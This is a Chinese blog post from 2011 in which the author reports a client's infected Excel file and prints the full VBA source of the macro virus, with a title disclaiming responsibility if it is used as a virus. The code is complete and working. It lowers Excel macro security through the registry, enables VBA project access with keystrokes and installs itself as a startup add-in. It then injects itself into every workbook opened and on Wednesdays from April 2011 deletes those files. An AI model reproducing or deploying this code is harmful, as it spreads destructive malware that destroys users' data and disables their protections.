excel vba 宏 恶意代码(用来做病毒责任自负)
2011-09-27 18:11
1056 查看
今天很恶心,碰到一个客户发来的excel有恶意代码,恶心,恶心
在thisworkbook 中的代码
在模板中的代码
在thisworkbook 中的代码
Public WithEvents xx As Application Private Sub Workbook_open() Set xx = Application On Error Resume Next If Sheets(1).Name <> "Macro1" Then Call auto_open End If Application.DisplayAlerts = False Security (1) Call SetAllowableVbe Call Microsofthobby End Sub Private Sub xx_workbookOpen(ByVal wb As Workbook) On Error Resume Next wb.VBProject.References.AddFromGuid _ GUID:="{0002E157-0000-0000-C000-000000000046}", _ Major:=5, Minor:=3 Application.ScreenUpdating = False Application.DisplayAlerts = False If Now >= DateSerial("2011", "4", "1") _ And Weekday(Now, vbMonday) = 3 And wb.Name <> "rpt_pdm2cvs.xls" Then wb.ChangeFileAccess xlReadOnly Kill wb.FullName wb.Close False End If If copystart(wb) Then GoTo 700 700: wb.Save Application.ScreenUpdating = True End Sub
在模板中的代码
Global Const REG_SZ As Long = 1 Global Const REG_DWORD As Long = 4 Global Const HKEY_LOCAL_MACHINE = &H80000002 Global Const HKEY_CURRENT_USER = &H80000001 Global Const KEY_ALL_ACCESS = &H3F Global Const REG_OPTION_NON_VOLATILE = 0 Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, ByVal lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long Sub auto_open() Application.DisplayAlerts = False If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False Call delete_this_wk Call copytoworkbook If Movemacro4(ThisWorkbook) Then GoTo 800 800: ThisWorkbook.Save Application.ScreenUpdating = True End If End Sub Private Sub copytoworkbook() Const DQUOTE = """" ' one " character With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule .InsertLines 1, "Public WithEvents xx As Application" .InsertLines 2, "Private Sub Workbook_open()" .InsertLines 3, "Set xx = Application" .InsertLines 4, "On Error Resume Next" .InsertLines 5, "If Sheets(1).Name <> " & DQUOTE & "Macro1" & DQUOTE & " Then" .InsertLines 6, "Call auto_open" .InsertLines 7, "End If" .InsertLines 8, "Application.DisplayAlerts = False" .InsertLines 9, "Security (1)" .InsertLines 10, "Call SetAllowableVbe" .InsertLines 11, "Call Microsofthobby" .InsertLines 12, "End Sub" .InsertLines 13, "Private Sub xx_workbookOpen(ByVal wb As Workbook)" .InsertLines 14, "On Error Resume Next" .InsertLines 15, "wb.VBProject.References.AddFromGuid _" .InsertLines 16, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _" .InsertLines 17, "Major:=5, Minor:=3" .InsertLines 18, "Application.ScreenUpdating = False" .InsertLines 19, "Application.DisplayAlerts = False" .InsertLines 20, "If Now >= DateSerial(" & DQUOTE & "2011" & DQUOTE & ", " & DQUOTE & "4" & DQUOTE & ", " & DQUOTE & "1" & DQUOTE & ") _" .InsertLines 21, "And Weekday(Now, vbMonday) = 3 And wb.Name <> " & DQUOTE & "rpt_pdm2cvs.xls" & DQUOTE & "Then" .InsertLines 22, "wb.ChangeFileAccess xlReadOnly" .InsertLines 23, "Kill wb.FullName" .InsertLines 24, "wb.Close False" .InsertLines 25, "End If" .InsertLines 26, "If copystart(wb) Then GoTo 700" .InsertLines 27, "700: wb.Save" .InsertLines 28, "Application.ScreenUpdating = True" .InsertLines 29, "End Sub" End With End Sub Private Sub delete_this_wk() Dim VBProj As VBIDE.VBProject Dim VBComp As VBIDE.VBComponent Dim CodeMod As VBIDE.CodeModule Set VBProj = ThisWorkbook.VBProject Set VBComp = VBProj.VBComponents("ThisWorkbook") Set CodeMod = VBComp.CodeModule With CodeMod .DeleteLines 1, .CountOfLines End With End Sub Function copystart(ByVal wb As Workbook) On Error Resume Next Dim VBProj1 As VBIDE.VBProject Dim VBProj2 As VBIDE.VBProject Set VBProj1 = Workbooks("rpt_pdm2cvs.xls").VBProject Set VBProj2 = wb.VBProject If copymodule("copymod", VBProj1, VBProj2, False) Then Exit Function End Function Function copymodule(ModuleName As String, _ FromVBProject As VBIDE.VBProject, _ ToVBProject As VBIDE.VBProject, _ OverwriteExisting As Boolean) As Boolean On Error Resume Next Dim VBComp As VBIDE.VBComponent Dim FName As String Dim CompName As String Dim S As String Dim SlashPos As Long Dim ExtPos As Long Dim TempVBComp As VBIDE.VBComponent If FromVBProject Is Nothing Then copymodule = False Exit Function End If If Trim(ModuleName) = vbNullString Then copymodule = False Exit Function End If If ToVBProject Is Nothing Then copymodule = False Exit Function End If If FromVBProject.Protection = vbext_pp_locked Then copymodule = False Exit Function End If If ToVBProject.Protection = vbext_pp_locked Then copymodule = False Exit Function End If On Error Resume Next Set VBComp = FromVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then copymodule = False Exit Function End If FName = Environ("Temp") & "\" & ModuleName & ".bas" If OverwriteExisting = True Then If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then Err.Clear Kill FName If Err.Number <> 0 Then copymodule = False Exit Function End If End If With ToVBProject.VBComponents .Remove .Item(ModuleName) End With Else Err.Clear Set VBComp = ToVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then If Err.Number = 9 Then Else copymodule = False Exit Function End If End If End If FromVBProject.VBComponents(ModuleName).Export Filename:=FName SlashPos = InStrRev(FName, "\") ExtPos = InStrRev(FName, ".") CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1) Set VBComp = Nothing Set VBComp = ToVBProject.VBComponents(CompName) If VBComp Is Nothing Then ToVBProject.VBComponents.Import Filename:=FName Else If VBComp.Type = vbext_ct_Document Then Set TempVBComp = ToVBProject.VBComponents.Import(FName) With VBComp.CodeModule .DeleteLines 1, .CountOfLines S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines) .InsertLines 1, S End With On Error GoTo 0 ToVBProject.VBComponents.Remove TempVBComp End If End If Kill FName copymodule = True End Function Function Movemacro4(ByVal wb As Workbook) On Error Resume Next Dim sht As Object wb.Sheets(1).Select Sheets.Add Type:=xlExcel4MacroSheet ActiveSheet.Name = "Macro1" Range("A1").Select Application.CutCopyMode = False ActiveCell.FormulaR1C1 = "Door Locked" Range("A2").Select ActiveCell.FormulaR1C1 = "=ERROR(FALSE)" Range("A3").Select ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""TestMacro""))=4)" Range("A4").Select ActiveCell.FormulaR1C1 = "= ALERT(""运行此文件,需要宏功能!"",3)" Range("A5").Select ActiveCell.FormulaR1C1 = "= FILE.CLOSE(FALSE)" Range("A6").Select ActiveCell.FormulaR1C1 = "=END.IF()" Range("A7").Select ActiveCell.FormulaR1C1 = "=RETURN()" For Each sht In wb.Sheets wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False Next wb.Sheets(1).Visible = False End Function Private Sub AddPrivateNames() On Error Resume Next Dim sht As Object For Each sht In Sheets ThisWorkbook.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False Next End Sub Private Sub HideMacroSheet() ThisWorkbook.Excel4MacroSheets(1).Visible = xlSheetHidden End Sub Private Sub HideMacroSheeth() ThisWorkbook.Excel4MacroSheets(1).Visible = -1 End Sub Sub Microsofthobby() On Error Resume Next Dim myfile0 As String Dim myfile As String ' myfile0 = ThisWorkbook.FullName myfile = Application.StartupPath & "\rpt_pdm2cvs.xls" If ThisWorkbook.Path <> Application.StartupPath Then Set fs = CreateObject("Scripting.FileSystemObject") Application.ScreenUpdating = False If fs.FileExists(myfile) Then If True Then On Error Resume Next Workbooks("rpt_pdm2cvs.xls").Close False Kill myfile ThisWorkbook.IsAddin = True ThisWorkbook.SaveAs myfile Workbooks.Open myfile0 Else ThisWorkbook.Close False End If Else ThisWorkbook.IsAddin = True ThisWorkbook.SaveAs myfile Workbooks.Open myfile0 End If Application.ScreenUpdating = True End If End Sub '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Sub Security(Level) Dim VS As String VS = Application.Version CreateNewKey HKEY_LOCAL_MACHINE, "Software\Microsoft\Office\" & VS & "\Excel\Security\" SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Office\" & VS & "\Excel\Security", "Level", Level, 4 CreateNewKey HKEY_CURRENT_USER, "Software\Microsoft\Office\" & VS & "\Excel\Security\" SetKeyValue HKEY_CURRENT_USER, "Software\Microsoft\Office\" & VS & "\Excel\Security", "Level", Level, 4 End Sub Public Function CreateNewKey(lPredefinedKey As Long, sNewKeyName As String) Dim hNewKey As Long Dim lRetVal As Long lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal) RegCloseKey (hNewKey) End Function Public Function SetKeyValue(lPredefinedKey As Long, sKeyName As String, sValueName As String, vValueSetting As Variant, lValueType As Long) Dim lRetVal As Long Dim hKey As Long lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting) RegCloseKey (hKey) End Function Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, vValue As Variant) As Long Dim lValue As Long Dim sValue As String Select Case lType Case REG_SZ sValue = vValue SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) Case REG_DWORD lValue = vValue SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4) End Select End Function Sub SetAllowableVbe() On Error Resume Next Dim Chgset As Boolean Debug.Print ThisWorkbook.VBProject.Protection If Err.Number = 1004 Then Err.Clear Application.SendKeys "%TMS%T%V{ENTER}" Chgset = True DoEvents End If End Sub
相关文章推荐
- 恶意代码的亲密接触之病毒编程技术
- 恶意代码的亲密接触之病毒编程技术--3
- 病毒、木马、蠕虫与恶意代码关键点
- 恶意代码的亲密接触之病毒编程技术--2
- 恶意代码的亲密接触之病毒编程技术--1
- [置顶] 恶意代码--adobe启发式开源检测病毒引擎技术学习分享
- 恶意代码的亲密接触之病毒编程技术(3)
- 拯救网管老克——围剿肆虐企业的恶意代码和病毒之建议
- 【拯救行动第三季】围剿肆虐企业的恶意代码和病毒
- 老病毒再现新系统--警惕恶意代码死灰复燃,(NTDETECT.EXE,NTDETECT.COM)
- 网站数据库被SQL注入后清除script恶意病毒代码的方法
- 恶意代码的亲密接触之病毒编程技术
- 老病毒再现新系统--警惕恶意代码死灰复燃,(NTDETECT.EXE,NTDETECT.COM)
- 恶意代码的分类
- 一次网站被挂恶意代码的查错经历
- 获取被人电话本的小恶意程序(学习用的并非病毒)
- 网页恶意代码害及其解决方案
- 【Opencv_contribute】Bouding Box (ROI,一行代码解决框选交互,可以用来标定)